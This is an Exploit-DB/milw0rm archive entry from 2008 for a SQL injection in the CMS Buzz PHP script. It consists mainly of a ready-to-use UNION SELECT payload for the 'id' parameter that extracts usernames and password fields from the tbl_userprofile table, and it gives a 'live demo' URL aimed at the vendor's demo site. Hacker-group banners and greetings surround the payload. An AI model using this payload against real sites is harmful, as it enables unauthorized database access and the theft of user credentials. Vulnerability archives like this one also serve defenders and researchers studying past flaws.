CMS Buzz - 'id' SQL Injection

EDB-ID:

6408




Platform:

PHP

Date:

2008-09-09


#################################################################################################
####################################  proud to be muslim   ######################################
###                                                                                           ###
###                            rEm0te sql injction VulnErability                              ###
###                                                                                           ###
###                                    (cmsbuzz script)                                       ###
###                                                                                           ###
#################################################################################################
#################################################################################################
###                                                                                           ###
### AuTh0r : security fears team                                                              ###
###                                                                                           ###
### Home   : WwW.alsonaa.com                                                                  ###
###                                                                                           ###    
### members: HeB4RieH , germaya_x                                                             ###
###                                                                                           ###
#################################################################################################
#################################################################################################
###                                                                                           ###
### Script Name : cmsbuzz                                                                     ###
###                                                                                           ###
### download    : http://cmsbuzz.com/purchase.php                                             ###
###                                                                                           ###
### Email       : s-fteam@securityfears.cc                                                    ###
#################################################################################################
#################################################################################################
###                                                                                           ###
### d0rk ::  "use your mind"                                                                  ###
###                                                                                           ###
###                                                                                           ###
### -(:: sql Code ::)-                                                                        ###
###        ?action=playgame&id=(sql)                                                          ###
###(sql)=-6+union+select+1,2,3,concat_ws(0x3a3a,username,upasswd),5,6,7,8,9,10,11,12,13+from+tbl_userprofile--                           
###                                                                                           ###
#################################################################################################
###                                                                                           ###
### -(::  l!ve demo ::)-                                                                      ###
###                                                                                           ###
###http://demo.cmsbuzz.com/?action=playgame&id=-6+union+select+1,2,3,concat_ws(0x3a3a,username,upasswd),5,6,7,8,9,10,11,12,13+from+tbl_userprofile--
###                                                                                           ###
###                                                                                           ###
########################                                                    #####################
########################                                                    #####################
#################################################################################################
#################################################################################################
                                   -(:: !GreTzZ! ::)-
 ::SnIpEr.KiLLeR::fa6al error::black cheetah::X_HaCker::str0ke::MusliMs HaCkErs:: 
#################################################################################################
#################################################################################################

# milw0rm.com [2008-09-09]